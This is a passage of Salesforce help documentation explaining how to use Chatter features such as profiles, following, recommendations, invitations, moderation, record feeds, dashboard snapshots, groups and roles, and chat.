• Click Following to stop seeing a person's updates in the Chatter feed.

• Click a column header to sort the list:

◊ Name sorts alphabetically by name. By default, the list is sorted alphabetically, in ascending order.

◊ Following sorts based on who you're following and not following.

• Search for users by typing characters of a first or last name in the search box at the top of the page. The list automatically
filters based on what you type.

• At the top of the list, click a letter to list everyone whose last name begins with that letter.

• Invite people to join your Chatter network. Invited users can view profiles, post on their feed, and join groups, but can't
see your Salesforce data or records.

• View the people that Chatter recommends you follow. Click More in the Recommended People section to view all of your
recommendations. If no recommendations appear, then you're already following all the recommended people.
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Chatter, Profile, People, Groups, and Files tabs are available by default in the Chatter app. Select the Chatter app from the
app menu in the top right corner of any page. If your administrator has added these tabs to other apps, you see the tabs in
those apps unless you previously customized your display. In that case, add the tabs to those apps.

See Also:
Chatter Moderators

Profile Overview
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Note:  An enhanced version of the Profile page is currently available through a pilot program. For information on
enabling the enhanced version of the Profile page, contact salesforce.com.

Customize your profile with a photo and information about yourself so your coworkers can learn more about you. Click Your
Name > My Profile at the top of any page or click your name anywhere around the application to view your profile.

View other people's profiles by clicking their name. If hover details are enabled, you can also see contact details and perform
actions by hovering over people, files, and groups in the recent items lists and owner fields on records.

Chatter, Profile, People, Groups, and Files tabs are available by default in the Chatter app. Select the Chatter app from the
app menu in the top right corner of any page. If your administrator has added these tabs to other apps, you see the tabs in
those apps unless you previously customized your display. In that case, add the tabs to those apps.

From your profile:

• Click  in the Contact section to edit your contact information.
• Click  in the About Me section to add additional information about yourself.
•

Click  above the feed to search for posts you have commented on or shared.
• Post an update in the What are you working on? field.

• Upload a profile photo.

• Send a private message.

• See who's following you and who you're following. If you're not following anyone, click Find people to follow in the
Following list and start following people.

• View your group memberships. If you're not in any groups, click Join or create groups in the Groups list to join some
groups.

• See your recent updates in your Chatter feed.

• View a single feed update.

• View, download, and search files you've posted in Chatter.

• View the topics you’re talking about.

• See Chatter activity statistics and influence.

When using profiles, consider these tips:
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• Your post displays in your Chatter feed and the feeds of people following you. To delete your post from feeds, hover over

the post and click .
• You can attach files and links to your posts.

• Your contact information is also visible on your personal information page and is subject to validation or other rules set by
your administrator.

• When you change your email address in your contact information, a confirmation is sent to the new address. You must
click the link provided in that email for the change to take effect.

• Information in the About Me section is searchable. Use global search and view the People results.

• Portal users don't have profiles.

• For organizations using Salesforce to Salesforce, the Connection User displays in feeds, but does not have a profile.

• Users with the "Manage Users" permission can edit profiles and photos for other users.

• Click the People or Chatter links above the profile picture to go to the People list or to the Chatter page.

See Also:
People Recommendations

Using the Following and Followers Lists
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

View the Following and Followers lists on your profile to see who and what you're following, and who is following you. If
you're not following anyone, click Find people to follow in the Following list to view the People list and start following people.
You can also view the Following and Followers lists on other people's profiles.

Note:  When your administrator turns on Chatter, you automatically follow some users and records in your organization.

In either list, click Show All to view the full list in alphabetical order.

• Use the Next and Previous links to see more of the list.

• Optionally filter the Following list by people or objects, for example, accounts or files.

• In your Following list, click  to stop following a person or record.
• In another person's Following list, click Follow to follow a person or record.
• In any Followers list, click Follow to follow a person, or  to stop following them.
• Click Done to close the window.

See Also:
Post Visibility
People Recommendations
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People Recommendations
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter recommends people in your organization that you might want to follow based on similar interests. For example,
Chatter recommends people who:

• Follow the same people as you.

• Are in your management hierarchy, such as your manager, people who report to your manager, and people who report to
you.

Salesforce uses the Manager field on your personal information page to determine these recommendations. If this field is
blank, Chatter won't recommend people based on your management hierarchy. Only your Salesforce administrator can
edit the Manager field.

• Are popular, which means they have many followers.

• Are new to Chatter.

• Are interested in the same records as you. For example, someone who has looked at or edited an account that you've recently
viewed.

• Are often followed together with people you already follow. For example, if you follow Madison Rigsby, you get a
recommendation for Suzanne Powell if many people who follow Madison also follow Suzanne.

To see an expanded list of your recommendations, click More in the Recommendations section. If no recommendations
appear, then you're already following all the recommended people.

See Also:
Profile Overview

Using the Files Owned List
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The Files Owned list on a profile shows the five files the profile owner attached most recently to a Chatter feed on the a
profile, a record, or a group. It also includes files the profile owner has uploaded most recently to Salesforce CRM Content
libraries. Hover over a file and you can preview it by clicking the thumbnail, follow, share, download, upload a new version,
and go to the file detail page by clicking the file name.

To see a list of all the files the profile owner has attached and uploaded, to search for a specific file, or to perform actions on
a file, click Show All. The 25 most recently viewed files are listed by default. On this list you can:

• Search for files the profile owner has attached and uploaded in Chatter and Salesforce CRM Content. The list doesn't
include:

◊ Documents from the Documents tab.

◊ Attachments from the Notes and Attachments related list.
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• Upload private files or upload and share files with people, groups, or via a file link.

• Preview a file without downloading it.

• Follow and receive updates about a file in the Chatter feed. Click  next to the file you're following to stop receiving
updates about the file.

• Click  to download, upload a new version, share with people, groups, or via link, and see sharing settings.
• Click a file name to view the file detail page. You can view detail pages for all files, but you'll only see updates in the Chatter

feed for files you follow.
• Click a file owner's name to see his or her profile.

Note:

• Only files you have access to are listed. For example, if the profile owner posted a file to a private group or library
you're not a member of, you won't see that file in the list.

• Not all files can be previewed, such as copy-protected PDFs, unknown file types, and any file larger than 25 MB.
For files that can’t be previewed, the Preview option isn’t available on feeds or list views, and files appear as generic
file type icons in the feed. Some Microsoft Office 2007 features don't display correctly in previews.

• Files without a file extension or with an unrecognized file extension are listed as “unknown” in the Type column.

See Also:
Filtering Your Files List

Chatter Activity and Influence
See your personal Chatter activity statistics, such as how many posts you’ve made and how many likes you’ve received, and
check your relative Chatter influence.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter activity statistics include how many posts and comments you've made, how many comments you've received, and how
many people liked your posts and comments. Chatter influence shows how your activity stacks up to other people’s.

• Top Influencers lead collaboration efforts by regularly sharing essential content.

• Active Influencers encourage others to get involved and share knowledge.

• Observers are quiet participants or just getting started in Chatter.

You can see your Chatter activity statistics and influence on your profile under your photo. You can also see your coworkers'

Chatter activity and influence on their profiles. When viewing a profile, hover over  under the profile photo for details
about how that person is uniquely influential.

See Also:
Profile Overview
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Inviting People to Join Chatter
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Allow Invitations”To invite people to Chatter:

You can invite people from your company that don't have Salesforce licenses to use Chatter. Invited users can view profiles,
post on their feed, and join groups, but can't see your Salesforce data or records.

To invite people to Chatter:

1. Click Invite People to Chatter on the People page or Invite Coworkers! on the Chatter page.

Note:  You can only invite people with email addresses in your company's domains.

Portal users can't send invitations.

2. To send invitations from Chatter, enter email addresses and click Send.
3. To send invitations using your own email account, click send your own email invitation. If you have a default email client

set, an email containing an invitation link opens in your mail program. Otherwise, you see an invitation link that you can
copy and paste into an email.

You can also invite coworkers to join a public group even if they don't use Chatter yet. Additionally, owners and managers of
private groups can send invitations. If customer invitations are enabled, owners and managers can also invite customers. When
someone accepts an invitation to join the group, they join Chatter as well.

1. Click Groups and click on a group name.
2. In the Members section on the group detail page, click Invite People.

If you are the group owner or manager, you can also click Add/Remove Members, then click Invite them to Salesforce
Chatter!.

3. Enter email addresses and click Send.

Note: If a user doesn't accept the invitation within the first day, Chatter sends an email reminder the second day. If
the user doesn't accept that invitation, Chatter sends another reminder the following day.

A user has up to 60 days to accept an invitation to join Chatter. If during that time, an administrator deselects Allow
Invitations or removes the user's domain from the list, the user can't accept the invitation.

When delegated authentication single sign-on is enabled in your organization, invited users bypass the password
registration page. If their username already exists, they won’t be able to accept the invitation.

See Also:
About Chatter Customers in Private Groups
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MODERATE CHATTER FREE USERS

Chatter Moderators
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Moderate Chatter”To moderate Chatter:

A moderator is a Chatter user with some additional privileges such as:

• Activate or deactivate Chatter Free users

• Assign a Chatter Free user as moderator or take the privilege away

• Delete posts and comments that they can see

You can tell if someone is a moderator by the special banner on their profile picture.

See Also:
Chatter Group Roles Overview
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Assigning Moderator Privileges to Chatter Free Users
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Moderate Chatter”To assign moderator privileges to Chatter Free users:

As a moderator, you can assign moderator privileges to Chatter Free users in your organization. You can also remove them if
needed.

1. Go to the person's profile page by clicking their name in the People tab or on a feed.
2. On the profile page, click Manage User.

• If you want the person to be a moderator, select Assign Moderator Privileges.
• If the person is a moderator and you want to revoke those privileges, select Remove Moderator Privileges.

See Also:
Changing Chatter Group Roles

Deactivating Chatter Free Users
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Moderate Chatter”To deactivate Chatter Free users:

As a moderator, you can deactivate Chatter Free users if, for example, they left the company.

1. Go to the person's profile page by clicking their name in the People tab or on a feed.
2. On the profile page, click Manage User and select Deactivate User.

If you need to re-activate a Chatter Free user, you must use global search to find their profile, as deactivated users don't show
up on the People tab. To activate a user:

1. Find the person's profile using global search.
2. On the profile page, click Manage User and select Activate User.

See Also:
What happens when the owner of a Chatter group is deactivated?
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VIEWING UPDATES ON RECORDS AND LIST VIEWS

Automatically Following Records You Own
When you follow records you create, updates are sent to your Chatter feed when you or someone else changes a tracked field
on those records.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions.

User Permissions Needed

“Read” on the recordTo view a record:

By default, you don’t automatically follow the records you create. If you want to automatically follow the records you create,
you must enable auto-follow in your Chatter Settings.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Chatter Settings > My Feeds.
• If you clicked My Settings, select Chatter > My Feeds.

3. Select Automatically follow records I create.
4. Click Save.

Note: If the Account Owner field isn't tracked and someone changes the owner of an account, the new owner
won't automatically follow the account. To automatically follow a record when someone else assigns you ownership,
your administrator must enable the owner field on the object for feed tracking.

See Also:
Viewing Record Feeds
Record Recommendations

Viewing Record Feeds
View the Chatter feed associated with a record you follow to see updates about the record.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions
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Record feeds allow you to track information for records you have access to. On the record detail page, click Show Feed to
display the record feed above the account details.

In the record feed, you can

• View posts, comments, and tracked field changes

• Write an update about the record and share it with other people who follow the record

Updates on the record detail page also display on the Chatter page of people who follow the record, and anyone who has
access to the records can see the update on the All Company feed.

• See who is following the record

•
Search the record feed ( )

Note:  Record field changes in the feed aren’t included in the search results.

Can I create a custom report for records I'm following?
Currently, you can't customize a report based on records you're following in Chatter.

See Also:
The People and Records You Auto-Follow Initially

Can other people follow records I own?
Yes, provided that they can already see the record. People can only follow records they can see, and by extension, can only see
updates to records they can see.

See Also:
Record Recommendations

Record Recommendations
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Following records helps keep you up-to-date on important changes to accounts, contacts, opportunities, and more. Chatter
recommends records that you've viewed or edited, records that you own (and aren't already following), and parent accounts
of records that you're following.

Chatter won't recommend records that your Salesforce administrator has disabled feed tracking for. Only opportunities,
accounts, leads, contacts, and articles are included in record recommendations.
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To see an expanded list of your recommendations, click More in the Recommendations section. To see your record
recommendations by object, click the object in the side filters. For example, click Accounts to view only your account
recommendations.

If no recommendations appear, then you're already following all the recommended records.

See Also:
Viewing Record Feeds

Viewing Chatter Feeds on List Views
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

If Chatter is enabled, click Chatter on a standard or custom object list view to see a Chatter feed with updates from the
last 30 days for the records included in the list view. Click List to display the list view again. You can choose a different list
view from either mode.

• Click a record name to view the record, or a person's name to view their profile

• Click Comment to comment on a post

• Click Like to like a post

• Click the timestamp of a post, for example, Yesterday at 12:57 AM, to see that post in the feed of its associated record

• Click Show More to see older posts

Consider the following tips for Chatter feeds on list views:

• You can only view Chatter feeds on list views for objects enabled for feed tracking.

• If drag-and-drop scheduling on list views is enabled, you won't see Chatter feeds on the list views for accounts, contacts,
or leads.

See Also:
Viewing Record Feeds

Adding a List View as a Chatter Favorite
Add a list view as a Chatter favorite to monitor key business processes directly from your Chatter tab.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Open an existing list view or create a list view for a set of records, like for example accounts, opportunities, or leads.

2. Click Feed in the top-right corner to see the Chatter updates for the list items.
3. Click Add to Favorites.
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The favorite name on the Chatter tab is the same as the list view name.

See Also:
Viewing Record Feeds

DASHBOARDS AND DASHBOARD COMPONENTS

Following Dashboard Components
If feed tracking is enabled for dashboards, you can view updates and field changes in the Chatter feed. You can also follow
dashboards and certain dashboard components.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND access to dashboard folderTo view dashboards:

Following components isn't supported for dynamic dashboards.

Only unfiltered data is used to generate alerts. This prevents alerts being sent out (incorrectly) because a component’s value
appeared to cross a breakpoint as a result of filtering.

If you don't see feeds, ask your administrator to enable feed tracking for dashboards.

For example, to receive alerts when total sales for a gauge fall below a certain amount, set conditional highlighting on that
component, then follow it.

•
Hover over a component to display the  menu.

To clear the hover menu, click an empty part of the screen.

• Click Follow this Component.

To stop following a component, click  and select Following.

See Also:
Viewing Record Feeds

2378

Following Dashboard ComponentsCollaborate within Your Company



About Posting Snapshots to User and Group Feeds
When you post a component snapshot to a Chatter feed, consider who you would like to share and comment on the component.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

A snapshot is a static image of a dashboard component at a specific point in time posted to a Chatter feed. Post a component
snapshot to a user or group feed to share and comment on that component. For example, post a snapshot of this month's sales
to your team.

Each snapshot has a “Viewing As” label. This is the name of the running user whose dashboard component you’re viewing.

You can also post snapshots of filtered components (except Visualforce or s-control components). When viewers click the
snapshot title in the feed, they’re taken to your filtered view of the dashboard if the filters are still valid. If the filters aren’t
valid, they see the unfiltered dashboard.

If you don't see the option to post a snapshot, talk to your administrator about enabling dashboard component snapshots.

Important:  Posting a snapshot to a user or group feed makes it potentially visible to the entire organization:

• Posting to a user feed makes the snapshot public. Anyone who views that user's profile can see it.

• Posting to a public group makes the snapshot public. Anyone who views your profile or the group feed can see it.

• Posting to a private group shows the snapshot to all group members.

People can see it whether they have access to the dashboard or not. Make sure the component doesn't contain sensitive
information!

See Also:
Following Dashboard Components

Posting Snapshots to Chatter
Post a snapshot of a dashboard component to a Chatter feed to help other users follow changes in the data.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND access to dashboard folderTo view dashboards:

A snapshot is a static image of a dashboard component at a specific point in time posted to a Chatter feed.

• Post a component snapshot to its dashboard feed to share information with everyone following the dashboard. For example,
post a snapshot of a regional sales chart to let your team know that sales are down in the Midwest.

• Post a component snapshot to a user or group feed to spark comment or action from that user or group.
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Each snapshot has a “Viewing As” label. This is the name of the running user whose dashboard component you’re viewing.

You can also post snapshots of filtered components (except Visualforce or s-control components). When viewers click the
snapshot title in the feed, they’re taken to your filtered view of the dashboard if the filters are still valid. If the filters aren’t
valid, they see the unfiltered dashboard.

If you don't see feeds, ask your administrator to enable feed tracking for dashboards.

1. Hover over a component to display the  menu.

To clear the hover menu, click an empty part of the screen.

2. Choose where you want your snapshot to appear.

a. To show it in a dashboard, click Post Snapshot to Dashboard Feed.
b. To show it to a user or group, click Post Snapshot to User or Group Feed.

3. Write a comment in the text box and click OK. If you’re posting a filtered component, you may want to mention that in
your comment.

The snapshot and comment immediately appear in the dashboard feed.

Note:  Snapshot images display in feeds for four months. After four months, only the comments remain.

See Also:
Making a Post

CHATTER GROUPS

Chatter Groups Overview
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter groups let you collaborate with specific people. For example, if you're working on a team project, you can create a
group for your team to share project-related files and information. You can join up to 100 groups, and your company can have
a total of 10,000 groups. Chatter groups have different levels of access:

• Public: Anyone can see and add posts, comments, and files. Anyone can join a public group.

• Private: Only members can see and add posts, comments, and files. People must ask to join or be added by the group's
owner or managers. People with ”Modify All Data” permission can see posts, updates, and files, and join private groups
directly.

◊ Allow Customers: The group owner and managers can invite customers to join the group. You can easily identify groups
with customers by the orange upper left corner of the group photo.
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Note:  Once you allow customers in a group, you can't change the group access level.

Click Groups on the Chatter tab to see a list of groups.

Note: Chatter, Profile, People, Groups, and Files tabs are available by default in the Chatter app. Select the Chatter
app from the app menu in the top right corner of any page. If your administrator has added these tabs to other apps,
you see the tabs in those apps unless you previously customized your display. In that case, add the tabs to those apps.

See Also:
Chatter Group Roles Overview
About Chatter Customers in Private Groups

Chatter Groups Page Overview
The Groups page displays a list of the Chatter groups in your company.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Watch a Demo: Using Chatter Groups (2:16 minutes)

Click Groups on the sidebar of the Chatter page to display the list of Chatter groups. On the Groups page you can

Create a new group

Click New Group to access the New Group page and create your group.

Filter and sort the groups list

Use the following filters to filter your groups.
• All Groups shows all groups in your company

• Recently Viewed shows the groups you recently looked at, starting with the group you viewed last

• My Groups shows the groups you belong to, own, or manage

Click a column header to sort the list. The Group column sorts by group name; the Last Activity column sorts by the
date of the last post or comment on a group; the Membership column sorts based on your membership status.

Search for a group

Search for groups by typing two or more letters of a group name or description in the Find Groups box. The list
automatically filters based on what you type.

View a group

Click a group name to view the group. You can view all groups, but you'll only see updates and files for public groups,
and for private groups you belong to. Groups that allow customers say (With Customers).
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Join a public group or ask to join a private group

Click Join to join a public group. For private groups, click Ask to Join to email a request to join to the group's owner
and managers. Users with the “Modify All Data” permission can directly join private groups, and therefore see Join for
private groups.

Leave a group or withdraw a request to join a group

Click  to leave a group or to withdraw a request to join a group.

View the group owner’s profile

Click a group owner's name to see his or her profile.

Get a group recommendation

View the groups that Chatter recommends you join based on the group's popularity and the number of connections you
have in the group in the Recommendations section. Click More to see the full list. If you don't see recommendations,
you already belong to all the recommended groups.

See Also:
Using the Group Files List

CREATE PUBLIC OR PRIVATE GROUPS

Creating Chatter Groups
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Create Chatter groups to collaborate with your teams and work on projects.

1. On the Chatter tab, click Groups.
2. Click New Group and enter a group name and description.

Note:  The group name must be unique.

If Communities is enabled, the group name must be unique within the community.

3. Select an access level:

• Public: Anyone can see and add posts, comments, and files. Anyone can join a public group.
• Private: Only members can see and add posts, comments, and files. People must ask to join or be added by the group's

owner or managers. People with ”Modify All Data” permission can see posts, updates, and files, and join private groups
directly.

◊ Allow Customers: The group owner and managers can invite customers to join the group. You can easily identify
groups with customers by the orange upper left corner of the group photo.

2382

Creating Chatter GroupsCollaborate within Your Company



Note:  Once you allow customers in a group, you can't change the group access level.

4. Click Save.

Note:  You own groups you create. To assign a new owner, finish creating the group, then edit the group settings.

See Also:
Can I change a group's access level, for example, to make a private group public?

Editing, Changing the Owner, or Deleting Chatter Groups
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can edit settings for Chatter groups you own or manage.

1. Click Group Settings on a group detail page.
2. Optionally edit the group name and description.
3. Optionally type a name or click the lookup icon to search the group members to assign a new Owner. Only the current

owner or people with the “Modify All Data” permission can change the owner, and you must choose the owner from
existing members. Customers can't own groups.

4. Optionally change the access level:

Note: If you change a private group to public, updates and files are visible to all users, all pending requests to join
the group are accepted, and anyone can join the group.

• Public: Anyone can see and add posts, comments, and files. Anyone can join a public group.
• Private: Only members can see and add posts, comments, and files. People must ask to join or be added by the group's

owner or managers. People with ”Modify All Data” permission can see posts, updates, and files, and join private groups
directly.

◊ Allow Customers: The group owner and managers can invite customers to join the group. You can easily identify
groups with customers by the orange upper left corner of the group photo.

Note:  Once you allow customers in a group, you can't change the group access level.

5. Click Save.
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If you own a group or have the “Modify All Data” permission, click Delete to delete the group.

See Also:
Adding and Removing Chatter Group Members

Adding and Removing Chatter Group Members
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

To add or remove members for Chatter groups you own or manage:

1. Click Add/Remove Members on a group detail page.
2. Find who you're looking for:

• Search using the Find People search box.
• Toggle between Requests to join the group, Members of the group, and Everyone in your company.
• Use the Next and Previous links to see more of the list.

Note:  If the group allows customers, existing Chatter customers will appear in this list.

If you can't find who you're looking for, you can invite people by clicking Invite them to Salesforce Chatter!.

3. Click Add to add a member, or  to remove a member. For people who have requested to join, click Accept to accept the
request, or  to decline.

4. Click Done when you're finished.

People can also join groups directly. To be notified when you're added to Chatter groups, enable email notifications.

See Also:
Viewing Chatter Group Members

GROUP ROLES

Chatter Group Roles Overview
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

This table describes the actions that can be performed by members, managers, and owners of Chatter groups. Customers can
be group members and managers, but not owners.
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MemberManagerOwnerAction

YesYesYesPost, comment, and search
group feeds

YesYesChange member roles

YesYesEdit group settings

YesYesAdd and remove members

YesYesDelete posts and comments

YesYesEdit Information field

YesDelete group

YesChange group owner

People with the “Modify All Data” permission can perform all actions on all groups and people with the “View All Data”
permission can view details of all groups, regardless of membership.

See Also:
What happens when the owner of a Chatter group is deactivated?

Changing Chatter Group Roles
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

To change Chatter group roles for groups you own or manage:

1. Click Change Roles on a group detail page.
2. To search for members, start typing in the search box. Optionally sort the list by toggling between Managers and All

Members.
3. Select the Manager checkbox for people you want to be managers. If a customer is selected as a manager, they will be able

to see people who ask to join the group, even if they aren't in other common groups, and will be able to approve requests.

Note:  To change the group owner, you must own the group or have the “Modify All Data” permission. Click
the Group Settings link next to the current owner to assign a new owner.

4. Click Done.

See Also:
What happens when the owner of a Chatter group is deactivated?
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What happens when the owner of a Chatter group is
deactivated?

The deactivated user still owns the group, but a user with the “Modify All Data” permission can assign a new owner.

See Also:
Changing Chatter Group Roles

Deleting Chatter Groups
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Only the owner of a group and users with the “Modify All Data” permission can delete a group.

1. Click Group Settings on a group detail page.
2. Click Delete.
3. Click OK.

Deleting a group permanently deletes the updates of the group, including any links posted to the group. When you delete a
group that includes files, you're not deleting the files, just the references to the files. The files remain in their original location,
such as in each file owner’s Files I Own. If the files were posted to the group and not shared in other locations, deleting the
group also removes the references to the files. The files remain in the file owner's Files I Own, where they're private but can
be shared again later.

See Also:
Viewing Where a File is Shared

Can I change a group's access level, for example, to make
a private group public?

If you're a group owner or manager, you can change groups from private to public, or from public to private by editing the
group settings. If you change a private group to public, updates and files are visible to all users, all pending requests to join the
group are accepted, and anyone can join the group. You can't change the group access level for private groups that allow
customers.

See Also:
Chatter Group Roles Overview
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VIEW GROUPS AND THEIR MEMBERS

Viewing Chatter Group Details
Click a group's name in a feed, in the Groups list, or on someone's profile to see the group’s updates, files, and group members.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

How much detail you see and what you can do on a group’s page depends on the type of group, whether you’re a member,
owner or manager of the group, and on your group role.

Non-Members of Public Groups

If you’re viewing the group detail page of a public group you’re not a member of, you can

Post and comment
Type an update above the feed or comment below a post in the feed and click Share.

Join the group
Click Join to join the group.

View group description and information
The group description and information displays below the group photo.

View the group's members
The Group Members section shows the group’s current members. The group owner's picture has a key icon and displays
in the top left. For groups that allow customers, the Customers section shows you if the group has any customers.

View, download, and search files posted to the group
The group files are listed in the Group Files section on the right side of the group detail page.

View the topics the group is talking about
The group’s topics display below posts in the group feed.

Search for group information

Click  above the feed to search for information in the group.

Non-Members of Private Groups

If you’re viewing the group detail page of a private group you’re not a member of, you can only

Ask to join the group
Click Ask to Join to send an email to the owner and managers of a private group requesting to join.

View the group’s picture and description
The group description displays below the group photo.
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Group Members of Public and Private Groups

When you’re a member of a public or private group, you can also

Change Email Settings
Click Email Me... to be emailed about activity in the group, either every time someone posts, daily, or weekly. The link
changes depending on your settings. For example, selecting Every Post changes the link to Email Every Post. To stop
receiving email for the group's activity, click Turn Off Group Email. Clicking Email Settings takes you to the email
settings page, where you can modify all your Chatter email settings.

Invite People
If your administrator has enabled invitations, click Invite People to invite people not already using Chatter to join the
group. For private groups, you must be a manager or owner to invite people.

Leave the group

Click , or to withdraw a request to join a private group. To leave a group you own, you must first assign a new owner.

Group Owners and Group Managers

When you’re the owner or manager of a public or private group, you can also

Add or remove group members
Click Add/Remove Members to add or remove group members.

Change the group photo
Hover over the group photo and click Add Photo, Update, or Delete to modify the group photo.

Edit group settings
Click Group Settings to edit group settings, including the name, description, owner, and access level.

Edit the Information section

Click Add Information or  in the Information section to add additional information for the group's members. You
can customize this section, including its title, to say anything you want.

Edit the Description section

Click Add Description or  in the Description section to add a description of the group.

Change member roles
Click Change Roles to change member roles. This link doesn't display on groups with only one member.

Accept or decline requests for private groups
Click Requests to accept or decline requests to join a private group. This link only displays when there are requests.

See Also:
Using the Group Files List
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Viewing Chatter Group Memberships
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The Groups list on your profile shows you the Chatter groups you belong to, sorted by the most recent activity date. If you're
not a member of any groups, click Join or create groups to view the Groups tab and join some groups. You can also view the
Groups list on other people's profiles to see their group memberships.

Click Show All to view the full list in alphabetical order.

• Use the Next and Previous links to see more of the list.

• Click  to leave a group or withdraw a request to join.
• On another person's groups list, click Join to join a public group.

• On another person's groups list, click Ask to Join to send a request to join a private group.

• Click Done to close the window.

See Also:
Chatter Group Roles Overview

Viewing Chatter Group Members
The Members section on a Chatter group detail page shows all of the members of a group.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

For public groups, you can always see all group members. For private groups, you have to be a member of the group to see the
other group members.

1. Click Show All in the Members section to view the full group member list in alphabetical order.

In the Members window, you can:

• Filter the list to see all members, managers, or the owner
• Use the Next and Previous links to see more of the list
• Search using the Find Members search box

• Click Follow or  next to a person's name to start or stop following them.

You can’t follow customers.

2. Click Done to close the window.

See Also:
Joining or Leaving Chatter Groups
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Chatter Group Recommendations
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter recommends groups that you might want to join based on:

• The popularity of the group determined by the number of members.

• The number of people you're following in the group. Chatter recommends groups with the most members you're following.

• If the group is new (created in the last month).

To see an expanded list of your recommendations, click More in the Recommendations section. If no recommendations
appear, then you already belong to all the recommended groups.

See Also:
Joining or Leaving Chatter Groups

Using the Group Files List
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The Group Files list on a Chatter group shows the five most recent files posted to that group. Hover over a file and you can
preview it by clicking the thumbnail, follow, share, download, upload a new version, and go to the file detail page by clicking
the file name.

To see a list of all the files posted to a group, to search for a specific file, or to perform actions on a file, click Show All. The
25 most recently viewed files are listed by default. On this list you can:

• Search for files that have been posted to the group. The list includes files that you and other people have attached to the
Chatter feed on the group. The list doesn't include:

◊ Documents from the Documents tab.

◊ Attachments from the Notes and Attachments related list.

• Upload private files or upload and share files with people, groups, or via a file link.

• Preview a file without downloading it.

• Follow and receive updates about a file in the Chatter feed. Click  next to the file you're following to stop receiving
updates about the file.

• Click  to download, upload a new version, share with people, groups, or via link, and see sharing settings.
• Click a file name to view the file detail page. You can view detail pages for all files, but you'll only see updates in the Chatter

feed for files you follow.
• Click a file owner's name to see his or her profile.
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Note:

• Not all files can be previewed, such as copy-protected PDFs, unknown file types, and any file larger than 25 MB.
For files that can’t be previewed, the Preview option isn’t available on feeds or list views, and files appear as generic
file type icons in the feed. Some Microsoft Office 2007 features don't display correctly in previews.

• Files without a file extension or with an unrecognized file extension are listed as “unknown” in the Type column.

See Also:
Viewing Chatter Group Members

Accepting or Declining Private Group Requests
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

As the owner or manager of a private Chatter group, you can accept or decline requests to join the group. Additionally, users
with the “Modify All Data” permission can view and manage requests for all groups.

1. View the list of requests by doing one of the following:

• On a group detail page, click the Request link, for example, 3 Requests
• On a group detail page, click Add/Remove Members and then click the Requests filter, or scan for requests in the

Everyone filter
• Click the link provided in the email request

2. Accept or decline the requests.

Note: An email is sent to each person to tell them that their request was accepted or declined.

• Click Accept to accept. If there are more than two requests, you can accept them all by clicking Accept x of y, for
example, Accept 3 of 3.

• Click  to decline. Optionally enter a message that will be included with your decline email and click Send. If you
change your mind, you can click Cancel to go back.

3. Click Done to close the window.

If you make a private group public, any pending requests are automatically accepted.
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CHATTER MESSENGER (CHAT)

What is chat?
Chat lets you chat instantly and securely with people in Chatter. You don’t have to manually add anyone to a buddy
list—everyone you follow in Chatter shows up automatically in your chat list.

See Also:
Using Chatter Messenger

Using Chatter Messenger
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Click the Chat header to expand or minimize chat. To get the most out of your chat experience, click  in the chat list to
pop it out to a separate browser window. Then, you can easily chat with people while you browse other sites and use other
applications.

Note: Chatter Messenger is not supported using Microsoft® Internet Explorer® version 7.0. Internet Explorer 7 users
don’t have access to Chatter Messenger, and appear offline to other Chatter Messenger users. We recommend these
users switch to a different supported browser.

With chat, you can:

• Let people know if you're available to chat.

• Chat with people.

• Add people to and remove people from your My Favorites list.

• Pop out your chat to a separate browser window.

• Use emoticons when you chat with people.

• Customize your chat options, such as sounds and notifications.

• View your chat history.

See Also:
Chatter Messages Overview
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Using the Chat List
Tips for using the chat list.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

• Use the search box at the top of your chat list to quickly find and chat with any online Chatter user, including the people
you don't follow.

• Switch between active chats by clicking a chat in the Current Chats list.

• To add someone to your chat list, follow them in Chatter.

• Add people you chat with frequently to your My Favorites list.

• Click  to customize your chat options.

• Click your status at the top of the chat list to change your chat status on page 2394.

•
When a chat is minimized, you’ll see the new message indicator  for new messages.

See Also:
Changing Your Chat Status

